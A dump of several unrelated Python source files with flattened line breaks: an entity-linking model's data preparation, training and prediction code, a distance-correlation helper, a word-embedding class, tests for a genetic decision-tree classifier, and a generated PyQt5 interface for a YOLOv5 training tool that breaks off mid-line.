named_cands_t.index(m['gold'][0]) p = p_e_m_t[true_pos] except: # now we are not choose base on top30, so the list chosen by our way could be[0,1,2,6,15,17,...], # but we let the list to reorder by[0,1,2,...,29], # when we didn't choose the gt, we let the gt to be the order 31, cause gt could be the order 4 in the oringinal order, # but we just choose [0,1,2,6,...](i.e. 4 is not inside), when the model is training we want every mention could have gt, # so we do this. if m['gold'][0] in gt_pos: true_pos = gt_pos.index(m['gold'][0]) p = gt_p_e_m[true_pos] true_pos = len(named_cands_t) + 1 else: true_pos = -1 content_tmp.append({'true_pos':true_pos, 'p_e_m':p_e_m, 'named_cands':named_cands}) # save preprocessing (cheng) #while is training change the last cand to gold if true_pos >= len(named_cands_t): if not predict: true_pos = len(named_cands_t) - 1 p_e_m_t[-1] = p named_cands_t[-1] = m['gold'][0] else: # if is on predict then the ture_position is not exist true_pos = -1 cands = [self.model.entity_voca.get_id(wiki_prefix + c) for c in named_cands_t] mask = [1.] * len(cands) if len(cands) == 0 and not predict: continue elif len(cands) < self.args.n_cands_before_rank: # if len(cands) < top 30 candidate, then padding unk candidate to array cands += [self.model.entity_voca.unk_id] * (self.args.n_cands_before_rank - len(cands)) #cands represent candidate wili id named_cands_t += [Vocabulary.unk_token] * (self.args.n_cands_before_rank - len(named_cands_t)) #named_cands represent candidate's name p_e_m_t += [1e-8] * (self.args.n_cands_before_rank - len(p_e_m_t)) mask += [0.] * (self.args.n_cands_before_rank - len(mask)) #if exist mask = 1 else =0 if self.args.language == 'en': lctx = m['context'][0].strip().split() lctx_ids = [self.prerank_model.word_voca.get_id(t) for t in lctx if utils.is_important_word(t)] lctx_ids = [tid for tid in lctx_ids if tid != self.prerank_model.word_voca.unk_id] #drop unk id word lctx_ids = lctx_ids[max(0, len(lctx_ids) - self.args.ctx_window//2):] #if lctx len >50 then drop the word before 50 words rctx = m['context'][1].strip().split() rctx_ids = [self.prerank_model.word_voca.get_id(t) for t in rctx if utils.is_important_word(t)] rctx_ids = [tid for tid in rctx_ids if tid != self.prerank_model.word_voca.unk_id] rctx_ids = rctx_ids[:min(len(rctx_ids), self.args.ctx_window//2)] elif self.args.language == 'zh': lctx = HanziConv.toSimplified(m['context'][0].strip()) lctx = jieba.lcut(lctx) lctx_ids = [self.prerank_model.word_voca.get_id(t) for t in lctx if utils.is_important_word(t)] lctx_ids = [tid for tid in lctx_ids if tid != self.prerank_model.word_voca.unk_id] lctx_ids = lctx_ids[max(0, len(lctx_ids) - self.args.ctx_window//2):] rctx = HanziConv.toSimplified(m['context'][1].strip()) rctx = jieba.lcut(rctx) rctx_ids = [self.prerank_model.word_voca.get_id(t) for t in rctx if utils.is_important_word(t)] rctx_ids = [tid for tid in rctx_ids if tid != self.prerank_model.word_voca.unk_id] rctx_ids = rctx_ids[:min(len(rctx_ids), self.args.ctx_window//2)] ment = m['mention'].strip().split() ment_ids = [self.prerank_model.word_voca.get_id(t) for t in ment if utils.is_important_word(t)] ment_ids = [tid for tid in ment_ids if tid != self.prerank_model.word_voca.unk_id] m['sent'] = ' '.join(lctx + rctx) # secondary local context (for computing relation scores) #snd_local context only have small len(before '') if conll_doc is not None: conll_m = m['conll_m'] sent = conll_doc['sentences'][conll_m['sent_id']] start = conll_m['start'] end = conll_m['end'] snd_lctx = [self.model.snd_word_voca.get_id(t) for t in sent[max(0, start - self.args.snd_local_ctx_window//2):start]] snd_rctx = [self.model.snd_word_voca.get_id(t) for t in sent[end:min(len(sent), end + self.args.snd_local_ctx_window//2)]] snd_ment = [self.model.snd_word_voca.get_id(t) for t in sent[start:end]] if len(snd_lctx) == 0: snd_lctx = [self.model.snd_word_voca.unk_id] if len(snd_rctx) == 0: snd_rctx = [self.model.snd_word_voca.unk_id] if len(snd_ment) == 0: snd_ment = [self.model.snd_word_voca.unk_id] else: snd_lctx = [self.model.snd_word_voca.unk_id] snd_rctx = [self.model.snd_word_voca.unk_id] snd_ment = [self.model.snd_word_voca.unk_id] items.append({'context': (lctx_ids, rctx_ids), 'snd_ctx': (snd_lctx, snd_rctx), 'ment_ids': ment_ids, 'snd_ment': snd_ment, 'cands': cands, 'named_cands': named_cands_t, 'p_e_m': p_e_m_t, 'mask': mask, 'true_pos': true_pos, 'doc_name': doc_name, 'raw': m }) if len(items) > 0: # note: this shouldn't affect the order of prediction because we use doc_name to add predicted entities, # and we don't shuffle the data for prediction if len(items) > 100: print(len(items)) #means this docs have >100 mentions for k in range(0, len(items), 100): data.append(items[k:min(len(items), k + 100)]) else: data.append(items) save_cands[doc_name] = content_tmp # save preprocessing (cheng) tEnd = time.time() print("It cost %.4f min" % ((tEnd - tStart)/60)) with open(preprocessing_path + data_name + '.pickle', 'wb') as fp: # save preprocessing (cheng) pickle.dump(save_cands, fp, protocol=pickle.HIGHEST_PROTOCOL) return self.prerank(data, predict) def get_data_items_load(self, dataset, data_name, predict=False): data = [] cand_source = 'candidates' tStart = time.time() # load preprocessing pickle with open(preprocessing_path + data_name + '.pickle', 'rb') as fp: pre_data = pickle.load(fp) for doc_name, content in dataset.items(): items = [] conll_doc = content[0].get('conll_doc', None) count = 0 # for pickle for m in content: #load pre_data (cheng) named_cands = [] # avoid variable to change dict value named_cands += pre_data[doc_name][count]['named_cands'] p_e_m = [] # avoid variable to change dict value p_e_m = pre_data[doc_name][count]['p_e_m'] true_pos = pre_data[doc_name][count]['true_pos'] gt_pos = [c[0] for c in m['candidates']] gt_p_e_m = [min(1., max(1e-3, c[1])) for c in m['candidates']] try: true_pos = named_cands.index(m['gold'][0]) p = p_e_m[true_pos] except: if m['gold'][0] in gt_pos: true_pos = gt_pos.index(m['gold'][0]) p = gt_p_e_m[true_pos] true_pos = len(named_cands) + 1 else: true_pos = -1 #while is training change the last cand to gold if true_pos >= len(named_cands): if not predict: true_pos = len(named_cands) - 1 p_e_m[-1] = p named_cands[-1] = m['gold'][0] else: # if is on predict then the ture_position is not exist true_pos = -1 cands = [self.model.entity_voca.get_id(wiki_prefix + c) for c in named_cands] mask = [1.] * len(cands) if len(cands) == 0 and not predict: continue elif len(cands) < self.args.n_cands_before_rank: # if len(cands) < top 30 candidate, then padding unk candidate to array cands += [self.model.entity_voca.unk_id] * (self.args.n_cands_before_rank - len(cands)) #cands represent candidate wili id named_cands += [Vocabulary.unk_token] * (self.args.n_cands_before_rank - len(named_cands)) #named_cands represent candidate's name p_e_m += [1e-8] * (self.args.n_cands_before_rank - len(p_e_m)) mask += [0.] * (self.args.n_cands_before_rank - len(mask)) #if exist mask = 1 else =0 if self.args.language == 'en': lctx = m['context'][0].strip().split() lctx_ids = [self.prerank_model.word_voca.get_id(t) for t in lctx if utils.is_important_word(t)] lctx_ids = [tid for tid in lctx_ids if tid != self.prerank_model.word_voca.unk_id] #drop unk id word lctx_ids = lctx_ids[max(0, len(lctx_ids) - self.args.ctx_window//2):] #if lctx len >50 then drop the word before 50 words rctx = m['context'][1].strip().split() rctx_ids = [self.prerank_model.word_voca.get_id(t) for t in rctx if utils.is_important_word(t)] rctx_ids = [tid for tid in rctx_ids if tid != self.prerank_model.word_voca.unk_id] rctx_ids = rctx_ids[:min(len(rctx_ids), self.args.ctx_window//2)] elif self.args.language == 'zh': lctx = HanziConv.toSimplified(m['context'][0].strip()) lctx = jieba.lcut(lctx) lctx_ids = [self.prerank_model.word_voca.get_id(t) for t in lctx if utils.is_important_word(t)] lctx_ids = [tid for tid in lctx_ids if tid != self.prerank_model.word_voca.unk_id] lctx_ids = lctx_ids[max(0, len(lctx_ids) - self.args.ctx_window//2):] rctx = HanziConv.toSimplified(m['context'][1].strip()) rctx = jieba.lcut(rctx) rctx_ids = [self.prerank_model.word_voca.get_id(t) for t in rctx if utils.is_important_word(t)] rctx_ids = [tid for tid in rctx_ids if tid != self.prerank_model.word_voca.unk_id] rctx_ids = rctx_ids[:min(len(rctx_ids), self.args.ctx_window//2)] ment = m['mention'].strip().split() ment_ids = [self.prerank_model.word_voca.get_id(t) for t in ment if utils.is_important_word(t)] ment_ids = [tid for tid in ment_ids if tid != self.prerank_model.word_voca.unk_id] m['sent'] = ' '.join(lctx + rctx) # secondary local context (for computing relation scores) #snd_local context only have small len(before '') if conll_doc is not None: conll_m = m['conll_m'] sent = conll_doc['sentences'][conll_m['sent_id']] start = conll_m['start'] end = conll_m['end'] snd_lctx = [self.model.snd_word_voca.get_id(t) for t in sent[max(0, start - self.args.snd_local_ctx_window//2):start]] snd_rctx = [self.model.snd_word_voca.get_id(t) for t in sent[end:min(len(sent), end + self.args.snd_local_ctx_window//2)]] snd_ment = [self.model.snd_word_voca.get_id(t) for t in sent[start:end]] if len(snd_lctx) == 0: snd_lctx = [self.model.snd_word_voca.unk_id] if len(snd_rctx) == 0: snd_rctx = [self.model.snd_word_voca.unk_id] if len(snd_ment) == 0: snd_ment = [self.model.snd_word_voca.unk_id] else: snd_lctx = [self.model.snd_word_voca.unk_id] snd_rctx = [self.model.snd_word_voca.unk_id] snd_ment = [self.model.snd_word_voca.unk_id] items.append({'context': (lctx_ids, rctx_ids), 'snd_ctx': (snd_lctx, snd_rctx), 'ment_ids': ment_ids, 'snd_ment': snd_ment, 'cands': cands, 'named_cands': named_cands, 'p_e_m': p_e_m, 'mask': mask, 'true_pos': true_pos, 'doc_name': doc_name, 'raw': m }) count += 1 if len(items) > 0: # note: this shouldn't affect the order of prediction because we use doc_name to add predicted entities, # and we don't shuffle the data for prediction if len(items) > 100: print(len(items)) #means this docs have >100 mentions for k in range(0, len(items), 100): data.append(items[k:min(len(items), k + 100)]) else: data.append(items) tEnd = time.time() print("It cost %.4f min" % ((tEnd - tStart)/60)) return self.prerank(data, predict) def train(self, org_train_dataset, org_dev_datasets, config): print('extracting training data') if self.args.language == 'en': train_dataset = self.get_data_items(org_train_dataset, data_name='aida-train', predict=False) elif self.args.language == 'zh': train_dataset = self.get_data_items(org_train_dataset, data_name='tackbp2015_train', predict=False) print('#train docs', len(train_dataset)) dev_datasets = [] for dname, data in org_dev_datasets: dev_datasets.append((dname, self.get_data_items(data,dname, predict=True))) print(dname, '#dev docs', len(dev_datasets[-1][1])) print('creating optimizer') optimizer = optim.Adam([p for p in self.model.parameters() if p.requires_grad], lr=config['lr']) #what is the model.parameters()? best_f1 = -1 not_better_count = 0 is_counting = False eval_after_n_epochs = self.args.eval_after_n_epochs for e in range(config['n_epochs']): shuffle(train_dataset) total_loss = 0 for dc, batch in enumerate(train_dataset): # each document is a minibatch self.model.train() optimizer.zero_grad() #change optimizer gradient to zero because the default gradient is not zero # convert data items to pytorch inputs token_ids = [m['context'][0] + m['context'][1] if len(m['context'][0]) + len(m['context'][1]) > 0 else [self.model.word_voca.unk_id] for m in batch] s_ltoken_ids = [m['snd_ctx'][0] for m in batch] s_rtoken_ids = [m['snd_ctx'][1] for m in batch] s_mtoken_ids = [m['snd_ment'] for m in batch] entity_ids = Variable(torch.LongTensor([m['selected_cands']['cands'] for m in batch]).cuda()) true_pos = Variable(torch.LongTensor([m['selected_cands']['true_pos'] for m in batch]).cuda()) p_e_m = Variable(torch.FloatTensor([m['selected_cands']['p_e_m'] for m in batch]).cuda()) entity_mask = Variable(torch.FloatTensor([m['selected_cands']['mask'] for m in batch]).cuda()) token_ids, token_mask = utils.make_equal_len(token_ids, self.model.word_voca.unk_id) s_ltoken_ids, s_ltoken_mask = utils.make_equal_len(s_ltoken_ids, self.model.snd_word_voca.unk_id, to_right=False) s_rtoken_ids, s_rtoken_mask = utils.make_equal_len(s_rtoken_ids, self.model.snd_word_voca.unk_id) s_rtoken_ids = [l[::-1] for l in s_rtoken_ids] s_rtoken_mask = [l[::-1] for l in s_rtoken_mask] s_mtoken_ids, s_mtoken_mask = utils.make_equal_len(s_mtoken_ids, self.model.snd_word_voca.unk_id) token_ids = Variable(torch.LongTensor(token_ids).cuda()) token_mask = Variable(torch.FloatTensor(token_mask).cuda()) # too ugly but too lazy to fix it self.model.s_ltoken_ids = Variable(torch.LongTensor(s_ltoken_ids).cuda()) self.model.s_ltoken_mask = Variable(torch.FloatTensor(s_ltoken_mask).cuda()) self.model.s_rtoken_ids = Variable(torch.LongTensor(s_rtoken_ids).cuda()) self.model.s_rtoken_mask = Variable(torch.FloatTensor(s_rtoken_mask).cuda()) self.model.s_mtoken_ids = Variable(torch.LongTensor(s_mtoken_ids).cuda()) self.model.s_mtoken_mask = Variable(torch.FloatTensor(s_mtoken_mask).cuda()) scores = self.model.forward(token_ids, token_mask, entity_ids, entity_mask, p_e_m, gold=true_pos.view(-1, 1)) loss = self.model.loss(scores, true_pos) loss.backward() optimizer.step() self.model.regularize(max_norm=100) loss = loss.cpu().data.numpy() total_loss += loss print('epoch', e, "%0.2f%%" % (dc/len(train_dataset) * 100), loss, end='\r') print('epoch', e, 'total loss', total_loss, total_loss / len(train_dataset)) if (e + 1) % eval_after_n_epochs == 0: dev_f1 = 0 for di, (dname, data) in enumerate(dev_datasets): predictions = self.predict(data) f1 = D.eval(org_dev_datasets[di][1], predictions) print(dname, utils.tokgreen('micro F1: ' + str(f1))) if dname == 'aida-A' or dname == 'tackbp2015_dev': dev_f1 = f1 if config['lr'] == 1e-4 and dev_f1 >= self.args.dev_f1_change_lr: eval_after_n_epochs = 2 is_counting = True best_f1 = dev_f1 not_better_count = 0 config['lr'] = 1e-5 print('change learning rate to', config['lr']) if self.args.mulrel_type == 'rel-norm': optimizer = optim.Adam([p for p in self.model.parameters() if p.requires_grad], lr=config['lr']) elif self.args.mulrel_type == 'ment-norm': for param_group in optimizer.param_groups: param_group['lr'] = config['lr'] if is_counting: if dev_f1 < best_f1: not_better_count += 1 else: not_better_count = 0 best_f1 = dev_f1 print('save model to', self.args.model_path) self.model.save(self.args.model_path) if not_better_count == self.args.n_not_inc: break self.model.print_weight_norm() def predict(self, data): predictions = {items[0]['doc_name']: [] for items in data} self.model.eval() for batch in data: # each document is a minibatch token_ids = [m['context'][0] + m['context'][1] if len(m['context'][0]) + len(m['context'][1]) > 0 else [self.model.word_voca.unk_id] for m in batch] s_ltoken_ids = [m['snd_ctx'][0] for m in batch] s_rtoken_ids = [m['snd_ctx'][1] for m in batch] s_mtoken_ids = [m['snd_ment'] for m in batch] lctx_ids = s_ltoken_ids rctx_ids = s_rtoken_ids m_ids = s_mtoken_ids entity_ids = Variable(torch.LongTensor([m['selected_cands']['cands'] for m in batch]).cuda()) p_e_m = Variable(torch.FloatTensor([m['selected_cands']['p_e_m'] for m in batch]).cuda()) entity_mask = Variable(torch.FloatTensor([m['selected_cands']['mask'] for m in batch]).cuda()) true_pos = Variable(torch.LongTensor([m['selected_cands']['true_pos'] for m in batch]).cuda()) token_ids, token_mask = utils.make_equal_len(token_ids, self.model.word_voca.unk_id) s_ltoken_ids, s_ltoken_mask = utils.make_equal_len(s_ltoken_ids, self.model.snd_word_voca.unk_id, to_right=False) s_rtoken_ids, s_rtoken_mask = utils.make_equal_len(s_rtoken_ids, self.model.snd_word_voca.unk_id) s_rtoken_ids = [l[::-1] for l in s_rtoken_ids] s_rtoken_mask = [l[::-1] for l in s_rtoken_mask] s_mtoken_ids, s_mtoken_mask = utils.make_equal_len(s_mtoken_ids, self.model.snd_word_voca.unk_id) token_ids = Variable(torch.LongTensor(token_ids).cuda()) token_mask = Variable(torch.FloatTensor(token_mask).cuda()) # too ugly, but too lazy to fix it self.model.s_ltoken_ids = Variable(torch.LongTensor(s_ltoken_ids).cuda()) self.model.s_ltoken_mask = Variable(torch.FloatTensor(s_ltoken_mask).cuda()) self.model.s_rtoken_ids = Variable(torch.LongTensor(s_rtoken_ids).cuda()) self.model.s_rtoken_mask = Variable(torch.FloatTensor(s_rtoken_mask).cuda()) self.model.s_mtoken_ids = Variable(torch.LongTensor(s_mtoken_ids).cuda()) self.model.s_mtoken_mask = Variable(torch.FloatTensor(s_mtoken_mask).cuda()) scores = self.model.forward(token_ids, token_mask, entity_ids, entity_mask, p_e_m, gold=true_pos.view(-1, 1)) scores = scores.cpu().data.numpy() # print out relation weights if self.args.mode == 'eval' and self.args.print_rel: print('================================') weights = self.model._rel_ctx_ctx_weights.cpu().data.numpy() voca = self.model.snd_word_voca for i in range(len(batch)): print(' '.join([voca.id2word[id] for id in lctx_ids[i]]), utils.tokgreen(' '.join([voca.id2word[id] for id in m_ids[i]])), ' '.join([voca.id2word[id] for id in rctx_ids[i]])) for j in range(len(batch)): if i == j: continue np.set_printoptions(precision=2) print('\t', weights[:, i, j], '\t', ' '.join([voca.id2word[id] for id in lctx_ids[j]]), utils.tokgreen(' '.join([voca.id2word[id] for id in m_ids[j]])), ' '.join([voca.id2word[id] for id in rctx_ids[j]])) pred_ids = np.argmax(scores, axis=1) pred_entities = [m['selected_cands']['named_cands'][i] if m['selected_cands']['mask'][i] == 1 else (m['selected_cands']['named_cands'][0] if m['selected_cands']['mask'][0] == 1 else 'NIL') for (i, m) in zip(pred_ids, batch)] doc_names = [m['doc_name'] for m in batch] if self.args.mode == 'eval' and self.args.print_incorrect: gold = [item['selected_cands']['named_cands'][item['selected_cands']['true_pos']] if item['selected_cands']['true_pos'] >= 0 else 'UNKNOWN' for item in batch] pred = pred_entities for i in range(len(gold)): if gold[i] != pred[i]: print('--------------------------------------------') pprint(batch[i]['raw']) print(gold[i], pred[i]) if self.args.mode == 'eval' and self.args.print_correct: gold = [item['selected_cands']['named_cands'][item['selected_cands']['true_pos']] if item['selected_cands']['true_pos'] >= 0 else 'UNKNOWN' for item in batch] pred = pred_entities for i in range(len(gold)): if gold[i] == pred[i]: print('--------------------------------------------') pprint(batch[i]['raw']) print(gold[i], pred[i]) for dname, entity in zip(doc_names, pred_entities): predictions[dname].append({'pred': (entity, 0.)}) return predictions
# coding=utf-8 # 20160510 # __author__ = 'xhcao' import numpy as np import scipy.spatial as sp # A=self.method.distance_correction_for_one_matrix(X, dimension)\ # B=self.method.distance_correction_for_one_matrix(Y, dimension)\ # corr_matrix[i,j]=self.method.distance_correlation(A,B) " def distance_correction_for_one_matrix(x, dimension): # X是一个样本,ndarray类型,矩阵的每列为样本的一个特征属性 # akl n = x.shape[0] akl = sp.distance.cdist(x, x, 'minkowski', p = dimension) #norm - d minkowski distance #ak* ak_ = np.zeros(n) for i in range(0,n): ak_[i] = np.sum(akl[i,:])/n #a*l a_l = np.zeros(n) for i in range(0,n): a_l[i] = np.sum(akl[:,i])/n #a** a__ = np.mean(akl) res = akl - (np.ones((n,n))*ak_).T res = res - np.ones((n,n))*a_l res = res + np.ones((n,n))*a__ return res def distance_correlation(A,B): #计算两个样本之间的相关系数矩阵 A_B = np.mean(A*B) A_A = np.mean(A*A) B_B = np.mean(B*B) if A_A*B_B>0: return A_B/np.sqrt(A_A*B_B) else: return 0
import numpy as np from collections import OrderedDict from sklearn import preprocessing # This file contains the WordVectors class used to load and handle word embeddings def intersection(*args): """ This function returns the intersection between WordVectors objects I.e.: all words that occur in both objects simultaneously as well as their respective word vectors Returns: list(WordVectors) objects with intersecting words """ if len(args) < 2: print("! Error: intersection requires at least 2 WordVector objects") return None # Get intersecting words # WARNING: using set intersection will affect the order of words # in the original word vectors, to keep results consistent # it is better to iterate over the list of words # the resulting order will follow the first WordVectors's order # Get intersecting words common_words = set.intersection(*[set(wv.words) for wv in args]) # Get intersecting words following the order of first WordVector words = [w for w in args[0].words if w in common_words] # Retrieve vectors from a and b for intersecting words wv_out = list() # list of output WordVectors for wv in args: wv_out.append(WordVectors(words=words, vectors=[wv[w]for w in words])) return wv_out def union(*args, f="average"): """ Performs union of two or more word vectors, returning a new WordVectors containing union of words and combination of vectors according to given function. Arguments: *args - list of WordVectors objects f - (str) function to use when combining word vectors (default to average) Returns: wv - WordVectors as the union the input args """ if f == 'average': f = lambda x: sum(x)/len(x) union_words = set.union(*[set(wv.words) for wv in args]) words = list(union_words) vectors = np.zeros((len(words), args[0].dimension), dtype=float) for i, w in enumerate(words): # Get list of existing vectors for w vecs = np.array([wv[w] for wv in args if w in wv]) vectors[i] = f(vecs) # Combine vectors wv_out = WordVectors(words=words, vectors=vectors) return wv_out # Implements a WordVector class that performs mapping of word tokens to vectors # Stores words as class WordVectors: """ WordVectors class containing methods for handling the mapping of words to vectors. Attributes - word_id -- OrderedDict mapping word to id in list of vectors - words -- list of words mapping id (index) to word string - vectors -- n x dim matrix of word vectors, follows id order - counts -- not used at the moment, designed to store word count - dimension -- dimension of wordvectors - zipped -- a zipped list of (word, vec) used to construct the object - min_freq -- filter out words whose frequency is less than min_freq """ def __init__(self, words=None, vectors=None, counts=None, zipped=None, input_file=None, centered=True, normalized=False, min_freq=0, word_frequency=None): if words is not None and vectors is not None: self.word_id = OrderedDict() self.words = list() for i, w in enumerate(words): self.word_id[w] = i self.words = list(words) self.vectors = np.array(vectors) self.counts = counts self.dimension = len(vectors[0]) elif zipped: pass elif input_file: self.dimension = 0 self.word_id = dict() self.words = list() self.counts = dict() self.vectors = None self.read_file(input_file) if centered: self.center() if normalized: self.normalize() if word_frequency: self.filter_frequency(min_freq, word_frequency) def center(self): self.vectors = self.vectors - self.vectors.mean(axis=0, keepdims=True) def normalize(self): self.vectors = preprocessing.normalize(self.vectors, norm="l2") def get_words(self): return self.word_id.keys() # Returns a numpy (m, dim) array for a given list of words # I.e.: select vectors whose word are in argument words def get_vectors_from_words(self, words): vectors = np.zeros((len(words), self.dimension)) for i, w in enumerate(words): vectors[i] = self[w] return vectors # Return (word,vec) for given word # In future versions may only return self.vectors def loc(self, word, return_word=False): if return_word: return word, self.vectors[self.word_id[word]] else: return self.vectors[self.word_id[word]] def get_count(self, word): return self.freq[self.word_id[word]] # Get word, vector pair from id def iloc(self, id_query, return_word=False): if return_word: return self.words[id_query], self.vectors[id_query] else: return self.vectors[id_query] # Overload [], given word w returns its vector def __getitem__(self, key): if isinstance(key, int) or isinstance(key, np.int64): return self.iloc(key) elif isinstance(key, slice): # slice return ([w for w in self.words[key.start: key.stop]], [v for v in self.vectors[key.start: key.stop]]) return self.loc(key) def __len__(self): return len(self.words) def __contains__(self, word): return word in self.word_id def filter_frequency(self, min_freq, word_frequency): print("Filtering %d" % min_freq) words_kept = list() vectors_kept = list() for word, vec in zip(self.words, self.vectors): if word in word_frequency and word_frequency[word] > min_freq: words_kept.append(word) vectors_kept.append(vec) self.words = words_kept self.vectors = np.array(vectors_kept) self.word_id = OrderedDict() for i, w in enumerate(self.words): self.word_id[w] = i print(" - Found %d words" % len(self.words)) # Read file in following format: # n_items dim def read_file(self, path): with open(path) as fin: n_words, dim = map(int, fin.readline().rstrip().split(" ", 1)) self.dimension = dim # print("Reading WordVectors (%d,%d)" % (n_words, dim)) # Use this function to process line reading in map def process_line(s): s = s.rstrip().split(" ", 1) w = s[0] v = np.array(s[1].split(" "), dtype=float) return w, v data = map(process_line, fin.readlines()) self.words, self.vectors = zip(*data) self.words = list(self.words) self.word_id = {w: i for i, w in enumerate(self.words)} self.vectors = np.array(self.vectors, dtype=float) def save_txt(self, path): with open(path, "w") as fout: fout.write("%d %d\n" % (len(self.word_id), self.dimension)) for word, vec in zip(self.words, self.vectors): v_string = " ".join(map(str, vec)) fout.write("%s %s\n" % (word, v_string))
from tests.utils_testing import * X = iris.data y = iris.target def test_train_then_predict(): gt = GeneticTree(max_iter=10, mutation_prob=0.3) gt.fit(X, y) y_pred = gt.predict(X) assert y_pred.shape[0] == X.shape[0] unique_classes = set(np.unique(y)) for i in range(y_pred.shape[0]): assert unique_classes.__contains__(y_pred[i]) def test_train_then_predict_proba(): gt = GeneticTree(max_iter=10, initialization=Initialization.Full, initial_depth=10) gt.fit(X, y) y_pred = gt.predict_proba(X) assert y_pred.shape[0] == X.shape[0] unique_classes = set(np.unique(y)) assert y_pred.shape[1] == len(unique_classes) for i in range(y_pred.shape[0]): assert_almost_equal(np.sum(y_pred[i]), 1) def test_get_best_params(): cross_prob = [0.2, 0.4, 0.6, 0.8] accuracy_best = [] for i in range(len(cross_prob)): gt = GeneticTree(max_iter=10, cross_prob=cross_prob[i]) gt.fit(X, y) accuracy_best.append(gt.acc_best[-1]) assert len(accuracy_best) == len(cross_prob) best_accuracy_id = np.argmax(np.array(accuracy_best)) print(f"Best accuracy is for cross prob: {cross_prob[best_accuracy_id]}") def test_train_model_many_times(): gt = GeneticTree(max_iter=10, keep_last_population=True) gt.fit(X, y) for i in range(10): weights = np.ones(150) print(f"Score: {np.sum(gt.predict(X) == y)}") weights[gt.predict(X) != y] += 0.5 gt.partial_fit(X, y, sample_weight=weights)
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'Yolov5TrainGuide.ui' # # Created by: PyQt5 UI code generator 5.15.4 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_Yolov5TrainGuide(object): def setupUi(self, Yolov5TrainGuide): Yolov5TrainGuide.setObjectName("Yolov5TrainGuide") Yolov5TrainGuide.resize(962, 911) self.groupBox = QtWidgets.QGroupBox(Yolov5TrainGuide) self.groupBox.setGeometry(QtCore.QRect(10, 50, 941, 111)) self.groupBox.setObjectName("groupBox") self.create_dir = QtWidgets.QPushButton(self.groupBox) self.create_dir.setGeometry(QtCore.QRect(230, 70, 171, 31)) self.create_dir.setObjectName("create_dir") self.prepare = QtWidgets.QPushButton(self.groupBox) self.prepare.setGeometry(QtCore.QRect(530, 70, 171, 31)) self.prepare.setObjectName("prepare") self.layoutWidget = QtWidgets.QWidget(self.groupBox) self.layoutWidget.setGeometry(QtCore.QRect(10, 30, 921, 35)) self.layoutWidget.setObjectName("layoutWidget") self.horizontalLayout = QtWidgets.QHBoxLayout(self.layoutWidget) self.horizontalLayout.setContentsMargins(0, 0, 0, 0) self.horizontalLayout.setObjectName("horizontalLayout") self.label = QtWidgets.QLabel(self.layoutWidget) self.label.setObjectName("label") self.horizontalLayout.addWidget(self.label) self.location = QtWidgets.QLineEdit(self.layoutWidget) self.location.setMinimumSize(QtCore.QSize(340, 31)) self.location.setObjectName("location") self.horizontalLayout.addWidget(self.location) self.browse = QtWidgets.QPushButton(self.layoutWidget) self.browse.setMinimumSize(QtCore.QSize(0, 31)) self.browse.setObjectName("browse") self.horizontalLayout.addWidget(self.browse) self.label_2 = QtWidgets.QLabel(self.layoutWidget) self.label_2.setObjectName("label_2") self.horizontalLayout.addWidget(self.label_2) self.data_name = QtWidgets.QLineEdit(self.layoutWidget) self.data_name.setMinimumSize(QtCore.QSize(131, 31)) self.data_name.setObjectName("data_name") self.horizontalLayout.addWidget(self.data_name) self.label_3 = QtWidgets.QLabel(self.layoutWidget) self.label_3.setObjectName("label_3") self.horizontalLayout.addWidget(self.label_3) self.per = QtWidgets.QSpinBox(self.layoutWidget) self.per.setMinimumSize(QtCore.QSize(0, 33)) self.per.setProperty("value", 90) self.per.setObjectName("per") self.horizontalLayout.addWidget(self.per) self.label_7 = QtWidgets.QLabel(self.layoutWidget) self.label_7.setObjectName("label_7") self.horizontalLayout.addWidget(self.label_7) self.groupBox_2 = QtWidgets.QGroupBox(Yolov5TrainGuide) self.groupBox_2.setGeometry(QtCore.QRect(10, 160, 941, 121)) self.groupBox_2.setObjectName("groupBox_2") self.layoutWidget1 = QtWidgets.QWidget(self.groupBox_2) self.layoutWidget1.setGeometry(QtCore.QRect(10, 30, 921, 56)) self.layoutWidget1.setObjectName("layoutWidget1") self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.layoutWidget1) self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0) self.horizontalLayout_2.setObjectName("horizontalLayout_2") self.label_4 = QtWidgets.QLabel(self.layoutWidget1) self.label_4.setObjectName("label_4") self.horizontalLayout_2.addWidget(self.label_4) self.model_size = QtWidgets.QComboBox(self.layoutWidget1) self.model_size.setMinimumSize(QtCore.QSize(101, 31)) self.model_size.setObjectName("model_size") self.model_size.addItem("") self.model_size.addItem("") self.model_size.addItem("") self.model_size.addItem("") self.horizontalLayout_2.addWidget(self.model_size) self.label_6 = QtWidgets.QLabel(self.layoutWidget1) self.label_6.setObjectName("label_6") self.horizontalLayout_2.addWidget(self.label_6) self.batch_size = QtWidgets.QSpinBox(self.layoutWidget1) self.batch_size.setMinimumSize(QtCore.QSize(71, 33)) self.batch_size.setMinimum(1) self.batch_size.setMaximum(99999999) self.batch_size.setProperty("value", 16) self.batch_size.setObjectName("batch_size") self.horizontalLayout_2.addWidget(self.batch_size) self.label_5 = QtWidgets.QLabel(self.layoutWidget1) self.label_5.setObjectName("label_5") self.horizontalLayout_2.addWidget(self.label_5) self.epochs = QtWidgets.QSpinBox(self.layoutWidget1) self.epochs.setMinimumSize(QtCore.QSize(71, 33)) self.epochs.setMinimum(5) self.epochs.setMaximum(99999999) self.epochs.setProperty("value", 300) self.epochs.setObjectName("epochs") self.horizontalLayout_2.addWidget(self.epochs) self.label_8 = QtWidgets.QLabel(self.layoutWidget1) self.label_8.setObjectName("label_8") self.horizontalLayout_2.addWidget(self.label_8) self.gpuNum = QtWidgets.QSpinBox(self.layoutWidget1) self.gpuNum.setMinimumSize(QtCore.QSize(71, 33)) self.gpuNum.setMinimum(0) self.gpuNum.setMaximum(1) self.gpuNum.setProperty("value", 1) self.gpuNum.setObjectName("gpuNum") self.horizontalLayout_2.addWidget(self.gpuNum) self.verticalLayout = QtWidgets.QVBoxLayout() self.verticalLayout.setObjectName("verticalLayout") self.default_model = QtWidgets.QRadioButton(self.layoutWidget1) self.default_model.setChecked(True) self.default_model.setObjectName("default_model") self.verticalLayout.addWidget(self.default_model) self.other_model = QtWidgets.QRadioButton(self.layoutWidget1) self.other_model.setObjectName("other_model") self.verticalLayout.addWidget(self.other_model) self.horizontalLayout_2.addLayout(self.verticalLayout) self.generate_code = QtWidgets.QPushButton(self.groupBox_2) self.generate_code.setGeometry(QtCore.QRect(230, 80, 171, 